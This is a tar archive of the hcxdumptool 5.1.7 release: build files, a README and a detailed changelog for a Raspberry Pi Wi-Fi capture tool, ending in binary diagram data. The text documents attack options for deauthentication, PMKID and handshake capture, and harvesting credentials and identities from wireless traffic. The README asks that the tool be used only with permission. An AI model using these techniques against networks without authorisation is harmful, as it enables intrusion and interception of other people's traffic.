pax_global_header00006660000000000000000000000064135037002170014510gustar00rootroot0000000000000052 comment=992cd9e9eb225bc74d253a4d16c29a83899bde2e hcxdumptool-5.1.7/000077500000000000000000000000001350370021700140705ustar00rootroot00000000000000hcxdumptool-5.1.7/.gitignore000066400000000000000000000000251350370021700160550ustar00rootroot00000000000000hcxdumptool hcxpioff hcxdumptool-5.1.7/.gitmodules000066400000000000000000000001731350370021700162460ustar00rootroot00000000000000[submodule "include/android-ifaddrs"] path = include/android-ifaddrs url = https://github.com/morristech/android-ifaddrs hcxdumptool-5.1.7/Android.mk000066400000000000000000000003311350370021700157760ustar00rootroot00000000000000LOCAL_PATH:=$(call my-dir) HCX_CFLAGS:=-std=gnu99 -O3 -Wall -Wextra include $(CLEAR_VARS) LOCAL_MODULE := hcxdumptool LOCAL_CFLAGS += $(HCX_CFLAGS) LOCAL_SRC_FILES := hcxdumptool.c include $(BUILD_EXECUTABLE) hcxdumptool-5.1.7/AndroidManifest.xml000066400000000000000000000002411350370021700176560ustar00rootroot00000000000000 hcxdumptool-5.1.7/Makefile000066400000000000000000000017571350370021700155420ustar00rootroot00000000000000PREFIX ?=/usr/local INSTALLDIR = $(DESTDIR)$(PREFIX)/bin HOSTOS := $(shell uname -s) GPIOSUPPORT=off CC ?= gcc CFLAGS ?= -O3 -Wall -Wextra CFLAGS += -std=gnu99 INSTFLAGS = -m 0755 ifeq ($(HOSTOS), Linux) INSTFLAGS += -D endif all: build build: ifeq ($(HOSTOS), Linux) $(CC) $(CFLAGS) $(CPPFLAGS) -o hcxpioff hcxpioff.c $(LDFLAGS) $(CC) $(CFLAGS) $(CPPFLAGS) -o hcxdumptool hcxdumptool.c $(LDFLAGS) else $(info OS not supported) endif install: build ifeq ($(HOSTOS), Linux) install $(INSTFLAGS) hcxpioff $(INSTALLDIR)/hcxpioff install $(INSTFLAGS) hcxdumptool $(INSTALLDIR)/hcxdumptool else $(info OS not supported) endif ifeq ($(HOSTOS), Linux) rm -f hcxpioff rm -f hcxdumptool else $(info OS not supported) endif rm -f *.o *~ clean: ifeq ($(HOSTOS), Linux) rm -f hcxpioff rm -f hcxdumptool else $(info OS not supported) endif rm -f *.o *~ uninstall: ifeq ($(HOSTOS), Linux) rm -f $(INSTALLDIR)/hcxpioff rm -f $(INSTALLDIR)/hcxdumptool else $(info OS not supported) endif hcxdumptool-5.1.7/README.md000066400000000000000000000165451350370021700153620ustar00rootroot00000000000000hcxdumptool ============== Small tool to capture packets from wlan devices. After capturing, upload the "uncleaned" cap here (https://wpa-sec.stanev.org/?submit) to see if your ap or the client is vulnerable by using common wordlists. Convert the cap to hccapx and/or to WPA-PMKID-PBKDF2 hashline (16800) with hcxpcaptool (hcxtools) and check if wlan-key or plainmasterkey was transmitted unencrypted. Brief description -------------- Stand-alone binaries - designed to run on Raspberry Pi's with installed Arch Linux. It may work on other Linux systems (notebooks, desktops) and distributions, too. Detailed description -------------- | Tool | Description | | -------------- | ------------------------------------------------------------------------------------------------------ | | hcxdumptool | Tool to run several tests to determine if access points or clients are vulnerable | | hcxpioff | Turns Raspberry Pi off via GPIO switch | Compile -------------- Simply run: ``` make make install (as super user) ``` Compile for Android -------------- You need: * Android NDK installed in your system and in path variable * This repository cloned with all submodules (`--recursive` flag in `git clone` or `git submodules update` command run) Just run `ndk-build` - built executables for some architectures should be created inside `libs` directory. Copy it to your phone and enjoy. Requirements -------------- * Operatingsystem: Arch Linux (strict), Kernel >= 4.19 (strict). It may work on other Linux systems (notebooks, desktops) and distributions, too (no support for other distributions, no support for other operating systems). Don't use Kernel 4.4 (rt2x00 driver regression) * Chipset must be able to run in monitor mode and driver must support monitor mode (strict by: ip and iw). Recommended: MEDIATEK (MT7601) or RALINK (RT2870, RT3070, RT5370) chipset * Raspberry Pi A, B, A+, B+, Zero (WH). (Recommended: Zero (WH) or A+, because of a very low power consumption), but notebooks and desktops may work, too. * GPIO hardware mod recommended (push button and LED). Adapters -------------- hcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter! Otherwise it will not start! Get information about VENDOR, model, chipset and driver here: https://wikidevi.com Manufacturers do change chipsets without changing model numbers. Sometimes they add (v)ersion or (rev)vision. This list is for information purposes only and should not be regarded as a binding presentation of the products: | VENDOR MODEL | ID | | -------------------- | -------------------------------------------------------------------- | | EDIMAX EW-7711UAN | ID 7392:7710 Edimax Technology Co., Ltd | | ALLNET ALL-WA0150N | ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter | | TENDA W311U+ | ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter | | TP-LINK TL-WN722N v1 | ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n | | ALFA AWUS036H | ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter | Always verify the actual chipset with 'lsusb' and/or 'lspci'! Due to a bug in xhci subsystem other devices may not work at the moment: https://bugzilla.kernel.org/show_bug.cgi?id=202541 No support for a third party driver which is not part of the official kernel (https://www.kernel.org/) No support for a driver which doesn't support monitor and packet injection, native - if you need this features, do a request on www.kernel.org Antennas -------------- The best high frequency amplifier is a good antenna! | VENDOR MODEL | TYPE | | ---------------------- | --------------- | | LOGILINK WL0097 | grid parabolic | | TP-LINK TL-ANT2414 A/B | panel | | LevelOne WAN-1112 | panel | | DELOCK 88806 | panel | | TP-LINK TL-ANT2409 A | panel | Useful scripts -------------- | Script | Description | | ------------ | -------------------------------------------------------- | | bash_profile | Autostart for Raspberry Pi (copy to /root/.bash_profile) | | pireadcard | Back up a Pi SD card | | piwritecard | Restore a Pi SD card | | makemonnb | Example script to activate monitor mode | | killmonnb | Example script to deactivate monitor mode | Hardware mod - see docs gpiowait.odg (hcxdumptool) -------------- LED flashes 5 times if hcxdumptool successfully started LED flashes every 5 seconds if everything is fine and signals are received LED turns on, if no signal received during the last past 5 seconds Press push button at least > 5 seconds until LED turns on (also LED turns on if hcxdumptool terminates) Green ACT LED flashes 10 times Raspberry Pi turned off and can be disconnected from power supply Do not use hcxdumptool and hcxpioff together! Hardware mod - see docs gpiowait.odg -------------- LED flashes every 5 seconds 2 times if hcxpioff successfully started Press push button at least > 5 seconds until LED turns on Green ACT LED flashes 10 times Raspberry Pi turned off safely and can be disconnected from power supply Do not use hcxdumptool or hcxpioff together! Warning -------------- You must use hcxdumptool only on networks you have permission to do this, because: * hcxdumptool is able to prevent complete wlan traffic (depends on selected options) * hcxdumptool is able to capture PMKIDs from access points (only one single PMKID from an access point required) (use hcxpcaptool to save them to file) * hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required) (use hcxpcaptool to save them to file) * hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required) (use hcxpcaptool to save them to file) * hcxdumptool is able to capture passwords from the wlan traffic (use hcxpcaptool -E to save them to file, together with networknames) * hcxdumptool is able to capture plainmasterkeys from the wlan traffic (use hcxpcaptool -P to save them to file) * hcxdumptool is able to request and capture extended EAPOL (RADIUS, GSM-SIM, WPS) (hcxpcaptool will show you information about them) * hcxdumptool is able to capture identities from the wlan traffic (for example: request IMSI numbers from mobile phones - use hcxpcaptool -I to save them to file) * hcxdumptool is able to capture usernames from the wlan traffic (for example: user name of a server authentication - use hcxpcaptool -U to save them to file) * Do not use a logical interface and leave the physical interface in managed mode * Do not use hcxdumptool in combination with aircrack-ng, reaver, bully or other tools which takes access to the interface * Stop all services which takes access to the physical interface (NetworkManager, wpa_supplicant,...) * Do not use tools like macchanger, as they are useless, because hcxdumptool uses its own random mac address space hcxdumptool-5.1.7/changelog000066400000000000000000000741761350370021700157610ustar00rootroot0000000000000023.06.2019 ========== moved to v 5.1.7 hcxdumptool: improved help fixed pcpng option header 12.06.2019 ========== hcxdumptool: ignore more warnings if --ignore_warning is selcted do not report issues if you run this option!!! 29.05.2019 ========== hcxdumptool moved to v 5.1.5 19.05.2019 ========== hcxdumptool: activated option --ignore warning --ignore_warning : ignore warnings try this if you get some driver warnings do not report issues 16.04.2019 ========== updated wiki device and README.md. This adapters are working fine, running kernel 4.19, 4.20 and 5.0: EDIMAX EW-7711UAN ID 7392:7710 Edimax Technology Co., Ltd ALLNET ALL-WA0150N ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter TENDA W311U+ ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter LogiLink WL0151 ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter regardles of the xhci issue. 14.04.2019 ========== removed all device names from README.md, because VENDORS often change chipsets or driver errors occur: v1 of a device is working fine, while v2 doesn't work device A, running driver A is working fine, while device B running driver A doesn't work driver doesn't support monitor mode driver support monitor mode, but doesn't support packet injection Examples here: https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 https://bugzilla.kernel.org/show_bug.cgi?id=202541 To find a working device, I recommend to read wikidevi: https://wikidevi.com/ 02.04.2019 ========== hcxdumptool now use this radiotap header: static const uint8_t hdradiotap[] = { 0x00, 0x00, // radiotap version + pad byte 0x0e, 0x00, // radiotap header length 0x06, 0x8c, 0x00, 0x00, // bitmap 0x00, // flags 0x02, // rate 0x14, // tx power 0x01, // antenna 0x08, 0x00 // tx flags #define HDRRT_SIZE sizeof(hdradiotap) }; read more about radiotap header here: https://www.kernel.org/doc/Documentation/networking/mac80211-injection.txt header is working with: ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter removed "USB ID 7392:a812 Edimax Technology Co., Ltd" from "known as working device list" because this driver is not working with the radiotap header. 30.03.2019 ========== hcxdumptool: added new option --silent --silent : do not transmit! hcxdumptool is acting like a passive dumper added RTL8187. Removed the wron devices from the list (only RT3070 ia affected) * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter (ALFA AWUS036H) * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter 29.03.2019 ========== added cflag DEBUG if compiled with DEBUG, hcxdumptool show raw packets and raw GSP data, directly received from the device removed ALFA AWUS036NH from the "known as workinging list", because the device doesn't work any longer, running kernel 5.0. 28.03.2019 ========== removed devices from "known working" list: * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter (ALFA AWUS036H) * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter because they are not working running kernel 5.0 27.03.2019 ========== removed wiringPi dependency now we are running "bare metal" - complete GPIO stuff moved to hcxdumptool and hcxpioff do not use wiringPi in combination with hcxdumptool and/or hcxpioff Makefile: removed DOGPIOSUPPORT hcxdumptool: changed options wiringPi options to GPIO options --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use hcxpioff: changed options wiringPi options to GPIO options --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use The GPIO is disabled on default. If you like to activate GPIO support you must do the hardware modifactions as described here: doc/gpiowait.odg and set the options according to your modification. You can choose every GPIO pin, as long as you use a pull down resistor to ground. Raspberry model should be detected by automatic and according to the revision we use: GPIO mem 0x20000000 for A, B, A+, B+, and Zero, Zero W(H) GPIO mem 0x3F000000 for 2B, 3B, 3A+, 3B+ compute modules (CMx) are not supported. 20.03.2019 ========== hcxdumptool: GPIO pins are no longer hard coded! --wpi_button= : wiringPi number of of button (0...31, Raspberry Pi A and B: 0 .. 16) default = 7 --wpi_statusled= : wiringPi number of status LED (0...31, Raspberry Pi A and B: 0 .. 16) default = 0 19.03.2019 ========== hcxpioff: refactored - GPIO pins are no longer hard coded! --wpi_button= : wiringPi number of of button (0...31, Raspberry Pi A and B: 0 .. 16) default = 7 --wpi_statusled= : wiringPi number of status LED (0...31, Raspberry Pi A and B: 0 .. 16) default = 0 --help : show this help --version : show version 16.03.2019 ========== added man page hcxdumptool.1 removed device from list: USB ID 7392:a812 Edimax Technology Co., Ltd (Edimax AC600 USB / Manufacturer: Realtek) because the driver from here: https://github.com/aircrack-ng/rtl8812au is no longer working on kernel 5.0 09.03.2019 ========== hcxdumptool moved to v 5.1.4 hcxdumptool: added new option: --ignore_warning : hcxdumptool will not terminate if other services take access on the device : warning: expect problems if hcxdumptool tries to change channels From now on, hcxdumptool will not terminate during the initalization if another service take access on the interface. Expect problems and do not report issues related to this option!!!! From now on, hcxdumptool will also show channel and frequency (when running option -C) 1 / 2412MHz (20 dBm) 2 / 2417MHz (20 dBm) 3 / 2422MHz (20 dBm) 4 / 2427MHz (20 dBm) 5 / 2432MHz (20 dBm) 6 / 2437MHz (20 dBm) 7 / 2442MHz (20 dBm) 8 / 2447MHz (20 dBm) 9 / 2452MHz (20 dBm) 10 / 2457MHz (20 dBm) 11 / 2462MHz (20 dBm) 12 / 2467MHz (20 dBm) 13 / 2472MHz (20 dBm) 09.03.2019 ========== hcxdumptool: added improved warning message Now hcxdumptool print the error message received from the driver inside the brackets $ hcxdumptool -i wlp3s0f0u1 -c 14 initialization... warning: unable to set channel 14 (Invalid argument) - removed this channel from scan list In this case the user tried to set channel 14. The driver doesn't support this and responds with Invalid argument 07.03.2019 ========== hcxdumptool: added debug code in main packet loop [processpackets()] to print raw GPS data, received from GPSD: /* printf("\ndebug: %s\n", gpsddata); */ uncomment this before you run make to retrieve this values. 06.03.2019 ========== hcxdumptool: added GPS date and GPS time to status and pcapng comment field. $ sudo hcxdumptool -i wlp3s0f0u1 --use_gpsd -o test.pcapng initialization... connecting to GPSD... waiting up to 5 seconds to retrieve first position GPSD activated start capturing (stop with ctrl+c) GPS LATITUDE.............: 49.126403 GPS LONGITUDE............: 4.626175 GPS ALTITUDE.............: 129.500000 GPS DATE.................: 06.03.2019 GPS TIME.................: 21:52:41 INTERFACE................: wlp3s0f0u1 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: f04f7c89dabb MAC ACCESS POINT.........: 980ee432604d (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 61455 ANONCE...................: 182972399cd2e65deb7941601cca14b644681c092dcf6f704935c7f3d2eaceea INFO: cha=11, rx=7080, rx(dropped)=1676, tx=408, powned=10, err=0, lat=49.126342, lon=4.626268, alt=129.500000, gpsdate=06.03.2019, gpstime=22:01:55^C terminated... $ tshark -r test.pcapng-0 -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment 172 Mar 6, 2019 23:01:48.793212000 CET 1a:f8:7c:91:24:a3 lat:49.126337,lon:4.626268,alt:129.500000,date:06.03.2019,time:22:01:48 05.03.2019 ========== hcxdumptool: removed general info about tx-power - now we use iw style to show tx-power/channel hcxdumptool -i -C initialization... available channels: 1 (20 dBm) 2 (20 dBm) 3 (20 dBm) ... 132 (26 dBm) 136 (26 dBm) 140 (26 dBm) 149 (13 dBm) 153 (13 dBm) 157 (13 dBm) 161 (13 dBm) 165 (13 dBm) 26.02.2019 ========== hcxdumptool moved to version 5.1.3 due several bug fixes and improved rcascan status output 18.02.2019 ========== release hcxdumptool v 5.1.2 due to serveral bugfixes 02.02.2019 ========== release hcxdumptool v 5.1.1 20.01.2019 ========== hcxdumptool: added new MT76 device: "TP-LINK Archer Archer T2U" working with kernel: 4.19, 4.20 (some issues), 5.0 read more here: https://github.com/ZerBea/hcxdumptool/issues/42 https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 11.01.2019 ========== hcxdudmptool: From now on, we assume that a packet is outgoing, if dBm Antenne Signal is absent. 08.01.2019 ========== hcxdudmptool and mac80211_hwsim mac80211_hwsim is a Linux kernel module that can be used to simulate arbitrary number of IEEE 802.11 radios for mac80211. It can be used to test hcxdumptool: load module: $ sudo modprobe mac80211_hwsim run hcxdumptool to retrieve informations about the interface: $ hcxdumptool -I wlan interfaces: 020000000000 wlan0 (mac80211_hwsim) 020000000100 wlan1 (mac80211_hwsim) bring monitor interface up: $ sudo sudo ip link set hwsim0 up run hcxdumptool: $ sudo hcxdumptool -i wlan0 initialization... start capturing (stop with ctrl+c) INTERFACE:...............: wlan0 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: c8aacc9c01ec MAC ACCESS POINT.........: 580943000000 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62263 ANONCE...................: 513282ebb604e6e10c450d6c3eaa6428d118b54abeef4672be3ef700052305d5 INFO: cha=11, rx=0, rx(dropped)=0, tx=120, powned=0, err=0 run wireshark on wlan0 or hwsim0 to monitor hcxdumptool output. do not forget to remove mac80211_hwsim if the module is not longer needed! read more here: https://www.kernel.org/doc/readme/Documentation-networking-mac80211_hwsim-README 04.01.2019 ========== hcxdumptool - changed flash time: LED flashes every 5 seconds = everything is fine LED stays on = no signal received during the last past five seconds hcxdumptool - ignore double outgoing packets (rth->it_present == 0) 03.01.2019 ========== hcxdumptool: changed flash time (5 times longer on ERROR) hcxpioff: changed flash time 20.12.2018 ========== improved detection of broken driver from now on GPIO LED blinks twice every 5 seconds - if a possbile driver issue is detected - if no packets received during the last past 5 seconds another indicator is that the incomming packetcounter (rx=xxxx) doesn't increase or dmesg show this error: [65786.808078] ieee80211 phy2: rt2x00queue_flush_queue: Warning - Queue 14 failed to flush [65824.174119] ieee80211 phy2: rt2x00queue_flush_queue: Warning - Queue 14 failed to flush [67801.029527] ------------[ cut here ]------------ it seems to be a kernel issue that hcxdumptool isn't able to handle, automatically: https://bbs.archlinux.org/viewtopic.php?id=237028 https://bugs.openwrt.org/index.php?do=details&task_id=929&opened=169&status%5B0%5D= https://community.spiceworks.com/topic/2132263-ubuntu-16-04-wifi-disconnects-randomly https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1750226 https://www.raspberrypi.org/forums/viewtopic.php?t=206815 workaround: 1) get driver information $ hcxdumptool -I wlan interfaces: 7cdd90xxxxxx wlp3s0f0u2 (rt2800usb) 2) remove module $ modprobe -r rt2800usb 3) load module $ modprobe rt2800usb 18.12.2018 ========== added new option to set station MAC address --station_mac= : use this MAC address for station format = 112233445566 format = 112233000000 (to set only OUI) format = 445566 (to set only NIC) added new option to set access point MAC address --ap_mac= : use this MAC address for access point as start MAC format = 112233445566 format = 112233000000 (to set only OUI) format = 445566 (to set only NIC) warning: do not use a MAC of an existing access point in your range improved detection of broken driver set default ERRORMAX to 100 added option to set ERRORMAX -T : set maximum ERRROR count (hcxdumptool terminates when the value is reached) default: 100 errors Remarks: errorcount will increase by one, if send packet (tx=xxx) > 3*incomming packets (rx=xxx) 15.12.2018 ========== improved random generator (now seeded with and adapter mac address) Raspberry Pi: improved handling of GPIO switch 07.12.2018 ========== restore interface settings after -C improved help menu -more informations about monitor mode -more informations about packet injection monitor mode and packet injection must be supported by the driver, otherwise hcxdumptool will not work. 05.12.2018 ========== moved to v 5.1.0 (according to hashcat) 04.12.2018 ========== added new option: -C : show available channels and quit 27.11.2018 ========== added new option: --poweroff : once hcxdumptool finished, power off system 26.11.2018 ========== several big endian fixes switched to version 5.0.1 07.10.2018 ========== added new option filter mode 3: --filterlist= : mac filter list format: 112233445566 + comment maximum line lenght 255, maximum entries 64 --filtermode= : mode for filter list 1: use filter list as protection list (default) in transmission branch receive everything, interact with all APs and CLIENTs in range, except(!) the ones from the filter list 2: use filter list as target list in transmission branch receive everything, only interact with APs and CLIENTs in range, from the filter list 3: use filter list as target list in receiving branch only receive APs and CLIENTs in range, from the filter list 30.10.2018 ========== moved to version 5.0.0 05.10.2018 ========== added more error messages fixed small bug in error count on channel change failure 04.10.2018 ========== show GPS position (if activated) in status line (refresh every 5 seconds) fixed broken status display on rcascan increased speed of rcascan fixed error handling if selected channels not supported by driver if option -t is not set, skip empty channels after one second improved scan list fixed some static var 01.10.2018 ========== changed order of channels in default scan list: 1, 9, 6, 3, 11, 7, 1, 10, 6, 8, 11, 4, 1, 12, 6, 2, 11, 5, 13 27.09.2018 ========== added GPSD support (stored as comment in pcapng file) --use_gpsd : use GPSD to retrieve position add latitude, longitude and altitude to every pcapng frame device must be supported by GPSD: http://www.catb.org/gpsd/hardware.html (tested using: AktivePilot JENTRO BT-GPS-8) Retrieve GPS information with: $ tshark -r filename.pcapng -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment write mac_ap to pcapng SHB write mac_sta to pcapng SHB SHB optioncodes: #define OPTIONCODE_MACMYAP 62107 #define OPTIONCODE_RC 62108 #define OPTIONCODE_ANONCE 62109 #define OPTIONCODE_MACMYSTA 62110 16.09.2018 ========== show warning if NetworkManager and/or wpa_supplicant is running 15.09.2018 ========== added Cisco Systems, Inc VENDOR information --station_vendor= : use this VENDOR information for station 0: transmit no VENDOR information (default) 1: Broadcom 2: Apple-Broadcom 3: Sonos 4: Netgear-Broadcom 5: Wilibox Deliberant Group LLC 6: Cisco Systems, Inc 11.09.2018 ========== You can “uncomment a line” in a configuration file by removing the # at the start of the line. Or, to “comment out” a line, add a # character to the start of the line. 001122334455 myap # aabbccddeeff ignore this mac 112233445566 second ap # this is may comment 05.09.2018 ========== added Netgear Broadcom VENDOR information added Wilibox Deliberant Group LLC VENDOR information 04.09.2018 ========== improved rcascan (show time and access points which hide their ESSID) prepare detection of PMF refactored access point handling handle 4096 access points simultaneously refactored client handling handle 4096 clients simultaneously speed up retrieving PMKIDs (< 1 minute) attack access points which hide their ESSID increased filter list line length increased filter list maximum entries added option to show beacons in status output: --enable_status= : enable status messages bitmask: 1: EAPOL 2: PROBEREQUEST/PROBERESPONSE 4: AUTHENTICATON 8: ASSOCIATION 16: BEACON added option to choose station VENDOR information: --station_chipset= : use this VENDOR information for station 0: transmit no VENDOR information (default) 1: Broadcom 2: Apple-Broadcom 3: Sonos 30.08.2018 ========== iw/ip functionality added! now hcxdumptool will set monitor mode and bring up interface! previous interface settings will be restored, when hcxdumptool terminated 19.08.2018 ========== parse SAE authentication 19.08.2018 ========== added radio assignment scan --do_rcascan : show radio channel assignment (scan for target access points) --save_rcascan= : output rca scan list to file when hcxdumptool terminated --save_rcascan_raw= : output file in pcapngformat unfiltered packets including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 17.08.2018 ========== detect NETWORK EAP authentication system transmit BROADCAST beacon 16.08.2018 ========== From now on we store open system authentications to pcapng only if they have have a vendor specific field. we are no longer interested in standard open system authentications (payload len = 6) changed some default values: -D : deauthentication interval default: 10 (every 10 beacons) the target beacon interval is used as trigger -A : ap attack interval default: 10 (every 10 beacons) --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 100 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 100 tries (minimum: 4) affected: client-less attack deauthentication attacks will not work against protected management frames 13.08.2018 ========== increased some attack values: --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 100 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 100 tries (minimum: 4) 07.08.2018 ========== moved to 4.2.1 added communication between hcxdumptool and hcxpcaptool via pcapng option fields: 62108 for REPLAYCOUNT uint64_t 62109 for ANONCE uint8_t[32] enabled hardware handshake instead of software handshake changed beavior auf status: --enable_status= : enables status messages bitmask: 1: EAPOL 2: PROBEREQUEST/PROBERESPONSE 4: AUTHENTICATON 8: ASSOCIATION Now we use a bitmask to deliver status messages. 06.08.2018 ========== write ISB (Interface Statistic Block) at the end of a cpature 04.08.2018 ========== addet new option (--disable-active_scan) to hcxdumptool --disable_active_scan: do not transmit proberequests to BROADCAST using a BROADCAST ESSID 04.08.2018 ========== release hcxdumptool 4.2.0 complete refactored: -various new options -measurement of EAPOL timeout -full support for hashcat hashmodes -m 16800 and 16801 -now default format is pcapng $ ./hcxdumptool-bleeding --help hcxdumptool 4.2.0 (C) 2018 ZeroBeat usage : hcxdumptool example: hcxdumptool -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status options: -i : interface (monitor mode must be enabled) ip link set down iw dev set type monitor ip link set up -o : output file in pcapngformat management frames and EAP/EAPOL frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -O : output file in pcapngformat unencrypted IPv4 and IPv6 frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -W : output file in pcapngformat encrypted WEP frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -c : set scanlist (1,2,3,...) default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12 maximum entries: 127 allowed channels: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 34, 36, 38, 40, 42, 44, 46, 48, 52, 56, 58, 60, 62, 64 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 144, 147, 149, 151, 153, 155, 157 161, 165, 167, 169, 184, 188, 192, 196, 200, 204, 208, 212, 216 -t : stay time on channel before hopping to the next channel default: 5 seconds -E : EAPOL timeout default: 100000 = 1 second value depends on channel assignment -D : deauthentication interval default: 20 (every 20 beacons) the target beacon interval is used as trigger -A : ap attack interval default: 20 (every 20 beacons) the target beacon interval is used as trigger -I : show suitable wlan interfaces and quit -h : show this help -v : show version --filterlist= : mac filter list format: 112233445566 + comment maximum line lenght 128, maximum entries 32 --filtermode= : mode for filter list 1: use filter list as protection list (default) 2: use filter list as target list --disable_deauthentications: disable transmitting deauthentications affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 10 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --disable_disassociations : disable transmitting disassociations affected: retry (EAPOL 4/4 - M4) attack --disable_ap_attacks : disable attacks on single access points affected: client-less (PMKID) attack --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 10 tries (minimum: 4) affected: client-less attack deauthentication attacks will not work against protected management frames --disable_client_attacks : disable attacks on single clients points affected: ap-less (EAPOL 2/4 - M2) attack --enable_status : enable status messages --help : show this help --version : show version 01.08.2018 ========== moved some stuff from hcxtools to hcxdumptool repository prepare complete refactoring! 04.03.2018 ========== hcxdumptool: added new option -W -W : WEP encrypted packets output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 04.03.2018 ========== hcxdumptool again complete refactored: 02.03.2018 ========== hcxdumptool is complete refactored: - improved scan engine - improved authentication engine (incl. Radio Measurement, and NULL frame detection) - dropped timer - use threads for LED and channel switch - use only one file descriptor for raw socket operations - working on Intel Corporation Centrino Ultimate-N 6300 (rev 3e) WiFi adapter (kernel >= 4.15) - working on Alfa AWUS036NH, Alfa AWUS036NHA - working on Alfa AWUS036ACH (driver: https://github.com/kimocoder/rtl8812au) - more channels allowed (depends on installed wireless regulatory domain) - simple usage: hcxdumptool -i -o dumpfile.pcap -t 5 interface (real interface - no monX) must be in monitor - all services/programs with access to the interface must be stopped! - new format of blacklist - and more... reported to run on Gentoo https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/2#issuecomment-369256915 reported to run on OpenWRT/LEDE https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/3#issuecomment-369756725 reported to run with Intel Corporation Centrino Ultimate-N 6300 (rev 3e) https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/2#issuecomment-369259800 $ hcxdumptool -h hcxdumptool 4.1.0 (C) 2018 ZeroBeat usage: hcxdumptool options: -i : interface (monitor mode must be eanabled) ip link set down iw dev set type monitor ip link set up -o : output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -O : ip based traffic output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -c : set scanlist (1,2,3,... / default = default scanlist) default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12 allowed channels: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 36, 40, 44, 48, 52, 56, 60, 64 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 147, 151, 155, 167 -t : stay time on channel before hopping to the next channel default = 5 seconds -T : terminate after maximal errors : default: 1000000 -D : do not transmit deauthentications or disassociations -R : do not transmit requests -A : do not respond to requests from clients -B : blacklist (do not deauthenticate clients from this hosts) format = mac_ap:mac_sta:ESSID 112233445566:aabbccddeeff:networkname (max. 32 chars) -P : enable poweroff -s : enable status messages -I : show suitable wlan interfaces and quit -h : show this help -v : show version 27.02.2018 ========== Now recommendations since we are run into heavy problems with latest drivers and operating systems * Operatingsystem: archlinux (strict), Kernel >= 4.14 (strict) * Raspberry Pi A, B, A+, B+ (Recommended: A+ = very low power consumption or B+), but notebooks and desktops could work, too. * GPIO hardware mod recommended Supported adapters (strict) * USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter * USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter * USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter 25.02.2018 ========== - initial start of this repository - added hcxdumptool - added hcxpioff hcxdumptool-5.1.7/docs/000077500000000000000000000000001350370021700150205ustar00rootroot00000000000000hcxdumptool-5.1.7/docs/gpiowait.odg000066400000000000000000000331721350370021700173440ustar00rootroot00000000000000PKE=|N.++mimetypeapplication/vnd.oasis.opendocument.graphicsPKE=|Nmeta.xmlSM0W WcCR=mJM"b{ނlBJQqoͼ60VjU8Ba 